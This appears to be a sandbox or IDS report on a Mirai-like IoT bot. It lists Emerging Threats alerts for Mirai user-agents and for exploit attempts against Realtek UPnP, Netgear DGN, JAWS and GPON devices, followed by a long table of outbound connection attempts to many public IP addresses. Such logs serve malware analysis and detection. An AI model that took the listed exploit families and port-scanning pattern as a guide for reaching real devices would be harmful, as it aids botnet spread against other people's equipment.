                                                              2024-12-11T00:44:07.320798+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235295492.197.11.10749152TCP
                                                              2024-12-11T00:44:07.321167+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23478663.202.203.4452869TCP
                                                              2024-12-11T00:44:07.321904+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23596984.88.106.19580TCP
                                                              2024-12-11T00:44:07.321904+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23596984.88.106.19580TCP
                                                              2024-12-11T00:44:07.326315+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2336518149.162.57.9952869TCP
                                                              2024-12-11T00:44:07.335524+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360942184.39.177.2098080TCP
                                                              2024-12-11T00:44:07.335898+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345338159.41.41.5980TCP
                                                              2024-12-11T00:44:07.335898+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345338159.41.41.5980TCP
                                                              2024-12-11T00:44:07.347981+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351528102.95.198.3149152TCP
                                                              2024-12-11T00:44:07.370761+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335710162.113.251.15780TCP
                                                              2024-12-11T00:44:07.372219+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355786109.9.205.12380TCP
                                                              2024-12-11T00:44:07.372219+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355786109.9.205.12380TCP
                                                              2024-12-11T00:44:07.372597+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347396213.205.7.1428080TCP
                                                              2024-12-11T00:44:07.377149+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338566170.227.129.568080TCP
                                                              2024-12-11T00:44:07.461725+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235741616.56.252.1378080TCP
                                                              2024-12-11T00:44:07.524641+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2342166204.128.136.1388080TCP
                                                              2024-12-11T00:44:07.524965+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349556219.249.5.1128080TCP
                                                              2024-12-11T00:44:08.287466+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2342536219.246.122.2158080TCP
                                                              2024-12-11T00:44:08.319776+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343714187.36.28.308080TCP
                                                              2024-12-11T00:44:08.336001+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23510407.245.225.849152TCP
                                                              2024-12-11T00:44:08.345922+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235324232.47.171.16480TCP
                                                              2024-12-11T00:44:08.365163+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349738176.66.53.9980TCP
                                                              2024-12-11T00:44:08.377241+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2354296166.156.55.12080TCP
                                                              2024-12-11T00:44:08.461655+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233858818.56.150.5580TCP
                                                              2024-12-11T00:44:08.462365+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235969872.133.204.1508080TCP
                                                              2024-12-11T00:44:08.524349+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2357556112.110.69.178080TCP
                                                              2024-12-11T00:44:08.725493+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234930462.24.138.2280TCP
                                                              2024-12-11T00:44:09.073445+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235657814.60.181.1452869TCP
                                                              2024-12-11T00:44:09.285920+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348964123.153.95.1947574TCP
                                                              2024-12-11T00:44:09.295231+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342368210.0.231.23680TCP
                                                              2024-12-11T00:44:09.321728+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340710125.214.113.19049152TCP
                                                              2024-12-11T00:44:09.341698+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2351946150.142.67.13052869TCP
                                                              2024-12-11T00:44:09.349814+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359358117.40.15.12380TCP
                                                              2024-12-11T00:44:09.350616+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233475462.222.101.1458080TCP
                                                              2024-12-11T00:44:09.383184+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233761815.239.99.19680TCP
                                                              2024-12-11T00:44:10.300385+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351662177.57.59.1297574TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 11, 2024 00:42:50.163208961 CET4433360654.171.230.55192.168.2.23
                                                              Dec 11, 2024 00:42:50.163352966 CET33606443192.168.2.2354.171.230.55
                                                              Dec 11, 2024 00:42:50.284379959 CET4433360654.171.230.55192.168.2.23
                                                              Dec 11, 2024 00:42:51.432260990 CET43928443192.168.2.2391.189.91.42
                                                              Dec 11, 2024 00:42:55.940196991 CET597628080192.168.2.23170.13.70.64
                                                              Dec 11, 2024 00:42:55.940747023 CET4458881192.168.2.23118.114.118.190
                                                              Dec 11, 2024 00:42:55.941262960 CET482748080192.168.2.2365.224.38.249
                                                              Dec 11, 2024 00:42:55.941777945 CET466407574192.168.2.2334.136.79.41
                                                              Dec 11, 2024 00:42:55.942285061 CET4852280192.168.2.23178.51.3.128
                                                              Dec 11, 2024 00:42:55.942791939 CET3854080192.168.2.23202.152.121.18
                                                              Dec 11, 2024 00:42:55.943331957 CET4191280192.168.2.23152.158.234.19
                                                              Dec 11, 2024 00:42:55.944161892 CET4365837215192.168.2.23101.108.225.47
                                                              Dec 11, 2024 00:42:55.944667101 CET6029480192.168.2.23182.216.146.147
                                                              Dec 11, 2024 00:42:55.945156097 CET548368080192.168.2.23142.235.63.140
                                                              Dec 11, 2024 00:42:55.945678949 CET484588080192.168.2.23100.184.144.114
                                                              Dec 11, 2024 00:42:55.946208000 CET4171480192.168.2.23113.229.7.213
                                                              Dec 11, 2024 00:42:55.946665049 CET4290652869192.168.2.2384.2.80.57
                                                              Dec 11, 2024 00:42:55.947098970 CET4044080192.168.2.2321.244.144.86
                                                              Dec 11, 2024 00:42:55.947547913 CET504008080192.168.2.23216.18.254.161
                                                              Dec 11, 2024 00:42:55.947988987 CET548567574192.168.2.23167.151.164.41
                                                              Dec 11, 2024 00:42:55.948429108 CET418128080192.168.2.2387.116.84.152
                                                              Dec 11, 2024 00:42:55.948887110 CET4737252869192.168.2.23162.33.207.205
                                                              Dec 11, 2024 00:42:55.949333906 CET3714280192.168.2.2360.29.245.149
                                                              Dec 11, 2024 00:42:55.949774981 CET5690252869192.168.2.23194.213.146.39
                                                              Dec 11, 2024 00:42:55.950229883 CET607488080192.168.2.2328.144.199.55
                                                              Dec 11, 2024 00:42:55.950674057 CET5531880192.168.2.23222.76.197.121
                                                              Dec 11, 2024 00:42:55.951123953 CET515488080192.168.2.23182.98.49.24
                                                              Dec 11, 2024 00:42:55.951689959 CET513988080192.168.2.23210.181.40.142
                                                              Dec 11, 2024 00:42:55.952138901 CET4553680192.168.2.2342.242.241.33
                                                              Dec 11, 2024 00:42:55.952573061 CET392328080192.168.2.23106.44.250.26
                                                              Dec 11, 2024 00:42:55.953022957 CET5810437215192.168.2.23121.136.2.49
                                                              Dec 11, 2024 00:42:55.953468084 CET362248080192.168.2.23124.74.74.114
                                                              Dec 11, 2024 00:42:55.953954935 CET382188443192.168.2.2338.122.193.152
                                                              Dec 11, 2024 00:42:55.954401016 CET4778680192.168.2.23210.135.157.10
                                                              Dec 11, 2024 00:42:55.954844952 CET5004280192.168.2.23137.151.78.143
                                                              Dec 11, 2024 00:42:55.955271959 CET5423680192.168.2.23136.34.183.2
                                                              Dec 11, 2024 00:42:55.956049919 CET5671281192.168.2.2385.78.252.113
                                                              Dec 11, 2024 00:42:55.956501007 CET4153637215192.168.2.2326.83.38.216
                                                              Dec 11, 2024 00:42:55.956965923 CET577768443192.168.2.2335.36.155.170
                                                              Dec 11, 2024 00:42:55.957410097 CET4712880192.168.2.23167.210.102.18
                                                              Dec 11, 2024 00:42:55.957866907 CET531888080192.168.2.23118.35.168.154
                                                              Dec 11, 2024 00:42:55.958307028 CET5325880192.168.2.23163.152.100.25
                                                              Dec 11, 2024 00:42:55.958774090 CET390327574192.168.2.23134.32.128.235
                                                              Dec 11, 2024 00:42:55.959218025 CET5021449152192.168.2.23125.133.16.27
                                                              Dec 11, 2024 00:42:55.959676027 CET3901680192.168.2.23123.244.144.208
                                                              Dec 11, 2024 00:42:55.960130930 CET5376680192.168.2.23161.185.149.32
                                                              Dec 11, 2024 00:42:55.960575104 CET4408837215192.168.2.23158.219.39.254
                                                              Dec 11, 2024 00:42:55.961033106 CET525288080192.168.2.235.244.147.234
                                                              Dec 11, 2024 00:42:55.961473942 CET4215480192.168.2.2371.44.225.112
                                                              Dec 11, 2024 00:42:55.961926937 CET5897252869192.168.2.2379.39.229.25
                                                              Dec 11, 2024 00:42:55.962359905 CET5928452869192.168.2.2331.20.181.48
                                                              Dec 11, 2024 00:42:55.962810040 CET350388080192.168.2.2361.237.100.81
                                                              Dec 11, 2024 00:42:55.963278055 CET338705555192.168.2.2348.214.85.13
                                                              Dec 11, 2024 00:42:55.963712931 CET4524052869192.168.2.23161.199.124.145
                                                              Dec 11, 2024 00:42:55.964163065 CET414368080192.168.2.23190.249.69.106
                                                              Dec 11, 2024 00:42:55.964613914 CET5488080192.168.2.2323.173.106.27
                                                              Dec 11, 2024 00:42:55.965068102 CET4909480192.168.2.23192.135.140.135
                                                              Dec 11, 2024 00:42:55.965524912 CET547748080192.168.2.23204.81.207.188
                                                              Dec 11, 2024 00:42:55.965992928 CET6016880192.168.2.23220.15.89.10
                                                              Dec 11, 2024 00:42:55.966449022 CET4251437215192.168.2.23142.31.67.244
                                                              Dec 11, 2024 00:42:55.966883898 CET380107574192.168.2.23221.42.76.51
                                                              Dec 11, 2024 00:42:55.967338085 CET4401249152192.168.2.2379.10.209.34
                                                              Dec 11, 2024 00:42:55.967783928 CET5526480192.168.2.239.58.179.109
                                                              Dec 11, 2024 00:42:55.968233109 CET5820280192.168.2.2329.105.29.159
                                                              Dec 11, 2024 00:42:55.983833075 CET464327574192.168.2.23203.29.198.208
                                                              Dec 11, 2024 00:42:55.984287977 CET4574480192.168.2.2373.34.189.202
                                                              Dec 11, 2024 00:42:55.984755993 CET4300281192.168.2.23120.144.248.245
                                                              Dec 11, 2024 00:42:55.985219955 CET513788080192.168.2.23113.145.142.202
                                                              Dec 11, 2024 00:42:55.985661983 CET5321281192.168.2.23150.246.65.115
                                                              Dec 11, 2024 00:42:55.986128092 CET4383680192.168.2.23125.163.236.226
                                                              Dec 11, 2024 00:42:55.986569881 CET6074237215192.168.2.23149.241.161.180
                                                              Dec 11, 2024 00:42:55.987040997 CET604228080192.168.2.23184.96.7.28
                                                              Dec 11, 2024 00:42:55.987517118 CET406308080192.168.2.239.109.75.127
                                                              Dec 11, 2024 00:42:55.987993002 CET478947574192.168.2.23206.142.193.152
                                                              Dec 11, 2024 00:42:55.988462925 CET564248080192.168.2.2347.30.123.212
                                                              Dec 11, 2024 00:42:55.988939047 CET589405555192.168.2.2387.120.225.117
                                                              Dec 11, 2024 00:42:55.989409924 CET330588443192.168.2.23140.81.126.115
                                                              Dec 11, 2024 00:42:55.989900112 CET449645555192.168.2.23153.95.193.121
                                                              Dec 11, 2024 00:42:55.990376949 CET3863280192.168.2.2356.53.8.6
                                                              Dec 11, 2024 00:42:55.990855932 CET3317281192.168.2.2391.53.41.217
                                                              Dec 11, 2024 00:42:55.991328955 CET3402480192.168.2.23193.94.36.43
                                                              Dec 11, 2024 00:42:55.991794109 CET387608443192.168.2.2318.65.35.200
                                                              Dec 11, 2024 00:42:55.992275953 CET5589281192.168.2.2331.225.239.95
                                                              Dec 11, 2024 00:42:55.992747068 CET4821849152192.168.2.2393.31.4.225
                                                              Dec 11, 2024 00:42:55.993232965 CET432268080192.168.2.23206.130.7.22
                                                              Dec 11, 2024 00:42:55.993694067 CET3935280192.168.2.23222.38.112.228
                                                              Dec 11, 2024 00:42:55.994182110 CET440308443192.168.2.23137.27.133.90
                                                              Dec 11, 2024 00:42:55.994638920 CET4540080192.168.2.23203.2.27.219
                                                              Dec 11, 2024 00:42:55.995107889 CET5480680192.168.2.23143.186.21.173
                                                              Dec 11, 2024 00:42:55.996136904 CET3855037215192.168.2.2313.9.189.7
                                                              Dec 11, 2024 00:42:55.996623039 CET5033280192.168.2.2383.96.191.136
                                                              Dec 11, 2024 00:42:55.997106075 CET485165555192.168.2.23186.251.44.209
                                                              Dec 11, 2024 00:42:55.997574091 CET4235649152192.168.2.23166.192.145.39
                                                              Dec 11, 2024 00:42:55.998040915 CET385688080192.168.2.23211.70.46.51
                                                              Dec 11, 2024 00:42:55.998511076 CET539208443192.168.2.23196.115.212.171
                                                              Dec 11, 2024 00:42:55.998990059 CET555028080192.168.2.23187.147.83.5
                                                              Dec 11, 2024 00:42:55.999464989 CET4299480192.168.2.2314.232.148.193
                                                              Dec 11, 2024 00:42:55.999933958 CET533848080192.168.2.23162.198.43.227
                                                              Dec 11, 2024 00:42:56.000400066 CET5573880192.168.2.23154.140.14.6
                                                              Dec 11, 2024 00:42:56.000875950 CET5419280192.168.2.23186.173.246.164
                                                              Dec 11, 2024 00:42:56.001344919 CET6013881192.168.2.23118.30.132.235
                                                              Dec 11, 2024 00:42:56.001810074 CET5933680192.168.2.2334.57.137.153
                                                              Dec 11, 2024 00:42:56.002279043 CET560748443192.168.2.23139.77.12.175
                                                              Dec 11, 2024 00:42:56.002742052 CET525205555192.168.2.23140.9.134.133
                                                              Dec 11, 2024 00:42:56.003227949 CET4867680192.168.2.2340.223.116.254
                                                              Dec 11, 2024 00:42:56.003686905 CET3406680192.168.2.2316.29.234.244
                                                              Dec 11, 2024 00:42:56.004152060 CET5408049152192.168.2.23110.142.198.158
                                                              Dec 11, 2024 00:42:56.004612923 CET348968443192.168.2.2363.44.16.237
                                                              Dec 11, 2024 00:42:56.005089998 CET5364881192.168.2.23162.83.75.110
                                                              Dec 11, 2024 00:42:56.005565882 CET5845080192.168.2.23148.225.57.169
                                                              Dec 11, 2024 00:42:56.006016016 CET5848437215192.168.2.23141.80.218.97
                                                              Dec 11, 2024 00:42:56.006494999 CET4188837215192.168.2.2362.217.115.182
                                                              Dec 11, 2024 00:42:56.006942987 CET4540449152192.168.2.2350.91.199.9
                                                              Dec 11, 2024 00:42:56.007426977 CET412808080192.168.2.23215.50.246.23
                                                              Dec 11, 2024 00:42:56.007900000 CET5540237215192.168.2.2389.213.177.170
                                                              Dec 11, 2024 00:42:56.008377075 CET4176680192.168.2.23179.117.226.194
                                                              Dec 11, 2024 00:42:56.008835077 CET429745555192.168.2.2390.197.2.27
                                                              Dec 11, 2024 00:42:56.009285927 CET5624680192.168.2.23152.117.85.253
                                                              Dec 11, 2024 00:42:56.009749889 CET509648080192.168.2.2323.113.105.209
                                                              Dec 11, 2024 00:42:56.010209084 CET4625249152192.168.2.239.70.45.227
                                                              Dec 11, 2024 00:42:56.010653973 CET4326249152192.168.2.23113.146.56.79
                                                              Dec 11, 2024 00:42:56.011116028 CET4285649152192.168.2.23108.85.179.160
                                                              Dec 11, 2024 00:42:56.011590004 CET339388080192.168.2.23202.202.168.64
                                                              Dec 11, 2024 00:42:56.012058020 CET600248443192.168.2.23195.246.106.194
                                                              Dec 11, 2024 00:42:56.012514114 CET3731449152192.168.2.2347.69.248.12
                                                              Dec 11, 2024 00:42:56.012976885 CET5413281192.168.2.2342.208.199.211
                                                              Dec 11, 2024 00:42:56.013418913 CET5690081192.168.2.23118.137.245.66
                                                              Dec 11, 2024 00:42:56.013879061 CET583247574192.168.2.23201.200.12.116
                                                              Dec 11, 2024 00:42:56.027789116 CET4403437215192.168.2.23164.98.152.87
                                                              Dec 11, 2024 00:42:56.028233051 CET5772849152192.168.2.2365.131.166.130
                                                              Dec 11, 2024 00:42:56.028677940 CET5012649152192.168.2.2332.170.33.253
                                                              Dec 11, 2024 00:42:56.029118061 CET437748443192.168.2.23124.13.202.21
                                                              Dec 11, 2024 00:42:56.029571056 CET522587574192.168.2.2345.27.188.99
                                                              Dec 11, 2024 00:42:56.030025959 CET440568080192.168.2.23191.251.39.30
                                                              Dec 11, 2024 00:42:56.030467033 CET523428080192.168.2.2377.93.207.38
                                                              Dec 11, 2024 00:42:56.030930996 CET521665555192.168.2.23157.149.9.22
                                                              Dec 11, 2024 00:42:56.031373978 CET461345555192.168.2.2376.51.22.34
                                                              Dec 11, 2024 00:42:56.031822920 CET3400281192.168.2.23103.159.1.83
                                                              Dec 11, 2024 00:42:56.032264948 CET572088080192.168.2.23119.7.140.192
                                                              Dec 11, 2024 00:42:56.032722950 CET332905555192.168.2.23214.156.186.64
                                                              Dec 11, 2024 00:42:56.033164024 CET3739280192.168.2.23207.198.77.45
                                                              Dec 11, 2024 00:42:56.033615112 CET577668080192.168.2.2326.194.72.229
                                                              Dec 11, 2024 00:42:56.034065008 CET476565555192.168.2.2330.227.89.81
                                                              Dec 11, 2024 00:42:56.034507036 CET409968080192.168.2.23207.144.197.158
                                                              Dec 11, 2024 00:42:56.034948111 CET450007574192.168.2.233.254.159.181
                                                              Dec 11, 2024 00:42:56.035397053 CET4790237215192.168.2.23215.149.25.71
                                                              Dec 11, 2024 00:42:56.035851002 CET4138481192.168.2.2385.146.86.114
                                                              Dec 11, 2024 00:42:56.036314964 CET372248080192.168.2.23106.176.156.149
                                                              Dec 11, 2024 00:42:56.036768913 CET5938080192.168.2.23212.148.153.192
                                                              Dec 11, 2024 00:42:56.037231922 CET505007574192.168.2.23215.47.78.226
                                                              Dec 11, 2024 00:42:56.037688971 CET4761080192.168.2.2338.95.163.205
                                                              Dec 11, 2024 00:42:56.038166046 CET5308837215192.168.2.23169.80.247.56
                                                              Dec 11, 2024 00:42:56.038634062 CET3612281192.168.2.23214.127.32.13
                                                              Dec 11, 2024 00:42:56.039110899 CET5657849152192.168.2.2365.143.55.175
                                                              Dec 11, 2024 00:42:56.039608002 CET3419249152192.168.2.23121.19.25.76
                                                              Dec 11, 2024 00:42:56.040060997 CET518128443192.168.2.2380.42.221.252
                                                              Dec 11, 2024 00:42:56.040539026 CET4825852869192.168.2.2351.217.212.91
                                                              Dec 11, 2024 00:42:56.041018963 CET5476880192.168.2.23171.2.151.108
                                                              Dec 11, 2024 00:42:56.041469097 CET464348080192.168.2.23183.37.186.197
                                                              Dec 11, 2024 00:42:56.041935921 CET3729280192.168.2.23149.210.29.201
                                                              Dec 11, 2024 00:42:56.042393923 CET376228080192.168.2.2392.121.62.166
                                                              Dec 11, 2024 00:42:56.042871952 CET397708443192.168.2.23182.89.16.0
                                                              Dec 11, 2024 00:42:56.043345928 CET3903252869192.168.2.2361.2.36.48
                                                              Dec 11, 2024 00:42:56.043818951 CET5793252869192.168.2.23101.125.216.151
                                                              Dec 11, 2024 00:42:56.044264078 CET5867480192.168.2.23163.115.127.191
                                                              Dec 11, 2024 00:42:56.044702053 CET5021481192.168.2.2320.133.24.145
                                                              Dec 11, 2024 00:42:56.045154095 CET541907574192.168.2.23131.214.104.215
                                                              Dec 11, 2024 00:42:56.045615911 CET4080480192.168.2.23102.112.159.159
                                                              Dec 11, 2024 00:42:56.046066999 CET5565680192.168.2.2354.252.138.172
                                                              Dec 11, 2024 00:42:56.046508074 CET5957480192.168.2.23103.183.65.217
                                                              Dec 11, 2024 00:42:56.046953917 CET359328443192.168.2.2369.74.133.144
                                                              Dec 11, 2024 00:42:56.047410965 CET4021637215192.168.2.2392.35.9.7
                                                              Dec 11, 2024 00:42:56.047846079 CET5180452869192.168.2.23193.245.80.68
                                                              Dec 11, 2024 00:42:56.048943996 CET573968080192.168.2.2366.186.235.199
                                                              Dec 11, 2024 00:42:56.049427032 CET5147080192.168.2.2331.124.239.80
                                                              Dec 11, 2024 00:42:56.049882889 CET570648080192.168.2.23158.123.170.118
                                                              Dec 11, 2024 00:42:56.050358057 CET417128080192.168.2.23180.236.218.223
                                                              Dec 11, 2024 00:42:56.050832033 CET514225555192.168.2.23177.60.56.110
                                                              Dec 11, 2024 00:42:56.051332951 CET365228080192.168.2.2391.41.16.118
                                                              Dec 11, 2024 00:42:56.051804066 CET5106652869192.168.2.2373.124.161.55
                                                              Dec 11, 2024 00:42:56.052282095 CET5487452869192.168.2.23217.238.86.73
                                                              Dec 11, 2024 00:42:56.052728891 CET4416452869192.168.2.23131.95.252.218
                                                              Dec 11, 2024 00:42:56.053175926 CET388687574192.168.2.23141.202.115.162
                                                              Dec 11, 2024 00:42:56.053658009 CET4790280192.168.2.2313.239.19.86
                                                              Dec 11, 2024 00:42:56.054124117 CET3394080192.168.2.23168.174.53.247
                                                              Dec 11, 2024 00:42:56.054594040 CET3934480192.168.2.23205.19.156.154
                                                              Dec 11, 2024 00:42:56.055052996 CET4043049152192.168.2.23214.6.88.200
                                                              Dec 11, 2024 00:42:56.055519104 CET468767574192.168.2.23190.202.109.241
                                                              Dec 11, 2024 00:42:56.055960894 CET4191680192.168.2.23126.179.23.111
                                                              Dec 11, 2024 00:42:56.056426048 CET4522280192.168.2.2317.224.44.220
                                                              Dec 11, 2024 00:42:56.056888103 CET5906680192.168.2.2367.156.164.38
                                                              Dec 11, 2024 00:42:56.057344913 CET418868080192.168.2.2360.131.7.118
                                                              Dec 11, 2024 00:42:56.057799101 CET5679680192.168.2.23121.202.179.6
                                                              Dec 11, 2024 00:42:56.058254004 CET563788443192.168.2.233.26.211.195
                                                              Dec 11, 2024 00:42:56.058726072 CET3997049152192.168.2.23217.176.190.109
                                                              Dec 11, 2024 00:42:56.059186935 CET379568080192.168.2.2390.24.179.163
                                                              Dec 11, 2024 00:42:56.059645891 CET4233837215192.168.2.2372.93.110.172
                                                              Dec 11, 2024 00:42:56.060117960 CET335265555192.168.2.2381.109.6.200
                                                              Dec 11, 2024 00:42:56.060585976 CET4509680192.168.2.23187.32.93.189
                                                              Dec 11, 2024 00:42:56.061075926 CET488448443192.168.2.23192.37.151.90
                                                              Dec 11, 2024 00:42:56.061161995 CET808059762170.13.70.64192.168.2.23
                                                              Dec 11, 2024 00:42:56.061217070 CET597628080192.168.2.23170.13.70.64
                                                              Dec 11, 2024 00:42:56.061543941 CET3567280192.168.2.2376.17.188.37
                                                              Dec 11, 2024 00:42:56.061629057 CET8144588118.114.118.190192.168.2.23
                                                              Dec 11, 2024 00:42:56.061686993 CET4458881192.168.2.23118.114.118.190
                                                              Dec 11, 2024 00:42:56.062015057 CET3316280192.168.2.236.218.88.254
                                                              Dec 11, 2024 00:42:56.062208891 CET80804827465.224.38.249192.168.2.23
                                                              Dec 11, 2024 00:42:56.062249899 CET482748080192.168.2.2365.224.38.249
                                                              Dec 11, 2024 00:42:56.062480927 CET415388080192.168.2.2315.157.152.64
                                                              Dec 11, 2024 00:42:56.062774897 CET75744664034.136.79.41192.168.2.23
                                                              Dec 11, 2024 00:42:56.062786102 CET8048522178.51.3.128192.168.2.23
                                                              Dec 11, 2024 00:42:56.062810898 CET466407574192.168.2.2334.136.79.41
                                                              Dec 11, 2024 00:42:56.062820911 CET4852280192.168.2.23178.51.3.128
                                                              Dec 11, 2024 00:42:56.062968016 CET4246437215192.168.2.23207.207.172.96
                                                              Dec 11, 2024 00:42:56.063287020 CET8038540202.152.121.18192.168.2.23
                                                              Dec 11, 2024 00:42:56.063335896 CET3854080192.168.2.23202.152.121.18
                                                              Dec 11, 2024 00:42:56.063461065 CET4249480192.168.2.23221.40.54.221
                                                              Dec 11, 2024 00:42:56.063869953 CET8041912152.158.234.19192.168.2.23
                                                              Dec 11, 2024 00:42:56.063909054 CET4191280192.168.2.23152.158.234.19
                                                              Dec 11, 2024 00:42:56.063915014 CET3625837215192.168.2.23170.243.90.64
                                                              Dec 11, 2024 00:42:56.064387083 CET562368443192.168.2.23131.43.106.19
                                                              Dec 11, 2024 00:42:56.064857006 CET4627049152192.168.2.2376.227.143.215
                                                              Dec 11, 2024 00:42:56.065323114 CET451408080192.168.2.23124.39.196.18
                                                              Dec 11, 2024 00:42:56.065543890 CET3721543658101.108.225.47192.168.2.23
                                                              Dec 11, 2024 00:42:56.065572977 CET8060294182.216.146.147192.168.2.23
                                                              Dec 11, 2024 00:42:56.065584898 CET4365837215192.168.2.23101.108.225.47
                                                              Dec 11, 2024 00:42:56.065603971 CET6029480192.168.2.23182.216.146.147
                                                              Dec 11, 2024 00:42:56.065809965 CET516825555192.168.2.2354.78.250.89
                                                              Dec 11, 2024 00:42:56.066066027 CET808054836142.235.63.140192.168.2.23
                                                              Dec 11, 2024 00:42:56.066106081 CET548368080192.168.2.23142.235.63.140
                                                              Dec 11, 2024 00:42:56.066266060 CET5922849152192.168.2.23123.175.241.125
                                                              Dec 11, 2024 00:42:56.066744089 CET495548080192.168.2.23179.171.182.119
                                                              Dec 11, 2024 00:42:56.067212105 CET3341837215192.168.2.23167.126.69.248
                                                              Dec 11, 2024 00:42:56.067689896 CET3537252869192.168.2.23170.59.144.179
                                                              Dec 11, 2024 00:42:56.068156004 CET505828443192.168.2.2324.112.229.127
                                                              Dec 11, 2024 00:42:56.068631887 CET3575480192.168.2.2389.108.193.238
                                                              Dec 11, 2024 00:42:56.069109917 CET441667574192.168.2.23166.117.94.49
                                                              Dec 11, 2024 00:42:56.069572926 CET424668080192.168.2.2382.213.155.86
                                                              Dec 11, 2024 00:42:56.070038080 CET329068080192.168.2.239.61.172.208
                                                              Dec 11, 2024 00:42:56.070508957 CET421208080192.168.2.2392.244.233.206
                                                              Dec 11, 2024 00:42:56.070975065 CET383287574192.168.2.23187.114.160.162
                                                              Dec 11, 2024 00:42:56.071480989 CET3281480192.168.2.2311.219.254.179
                                                              Dec 11, 2024 00:42:56.071945906 CET4297452869192.168.2.23179.30.194.108
                                                              Dec 11, 2024 00:42:56.072412968 CET3737281192.168.2.2371.180.206.139
                                                              Dec 11, 2024 00:42:56.072864056 CET390068080192.168.2.2322.236.52.239
                                                              Dec 11, 2024 00:42:56.073333025 CET333148080192.168.2.23153.28.27.68
                                                              Dec 11, 2024 00:42:56.073793888 CET328788080192.168.2.23165.20.215.204
                                                              Dec 11, 2024 00:42:56.074266911 CET601688080192.168.2.23102.24.3.252
                                                              Dec 11, 2024 00:42:56.074734926 CET597408080192.168.2.2356.225.44.220
                                                              Dec 11, 2024 00:42:56.075196028 CET6070280192.168.2.2396.114.30.207
                                                              Dec 11, 2024 00:42:56.075671911 CET4931649152192.168.2.234.134.245.148
                                                              Dec 11, 2024 00:42:56.076127052 CET497267574192.168.2.2373.24.73.232
                                                              Dec 11, 2024 00:42:56.076601982 CET556365555192.168.2.23117.31.40.208
                                                              Dec 11, 2024 00:42:56.077059031 CET431428443192.168.2.2365.169.142.243
                                                              Dec 11, 2024 00:42:56.077545881 CET374288443192.168.2.23207.34.109.67
                                                              Dec 11, 2024 00:42:56.078011990 CET5113480192.168.2.23208.106.213.20
                                                              Dec 11, 2024 00:42:56.078474998 CET3592280192.168.2.23194.17.56.146
                                                              Dec 11, 2024 00:42:56.078932047 CET400545555192.168.2.23161.199.60.203
                                                              Dec 11, 2024 00:42:56.079402924 CET498948080192.168.2.2344.223.1.134
                                                              Dec 11, 2024 00:42:56.079876900 CET443148080192.168.2.23173.120.168.239
                                                              Dec 11, 2024 00:42:56.080332041 CET549068080192.168.2.23196.89.133.22
                                                              Dec 11, 2024 00:42:56.080806017 CET408967574192.168.2.23186.182.149.110
                                                              Dec 11, 2024 00:42:56.081290960 CET3328649152192.168.2.2343.107.215.199
                                                              Dec 11, 2024 00:42:56.081757069 CET5324880192.168.2.23211.47.207.159
                                                              Dec 11, 2024 00:42:56.082211971 CET5067480192.168.2.23150.55.156.79
                                                              Dec 11, 2024 00:42:56.082665920 CET3701480192.168.2.23120.231.177.238
                                                              Dec 11, 2024 00:42:56.083118916 CET507348443192.168.2.2380.52.213.9
                                                              Dec 11, 2024 00:42:56.083583117 CET6036480192.168.2.2360.47.9.239
                                                              Dec 11, 2024 00:42:56.084044933 CET4498680192.168.2.2393.22.239.48
                                                              Dec 11, 2024 00:42:56.084506989 CET409945555192.168.2.23134.220.93.111
                                                              Dec 11, 2024 00:42:56.084969044 CET596325555192.168.2.23196.150.108.122
                                                              Dec 11, 2024 00:42:56.085424900 CET537568443192.168.2.23218.248.31.238
                                                              Dec 11, 2024 00:42:56.085885048 CET3371837215192.168.2.23104.26.240.22
                                                              Dec 11, 2024 00:42:56.086352110 CET445347574192.168.2.2339.106.254.70
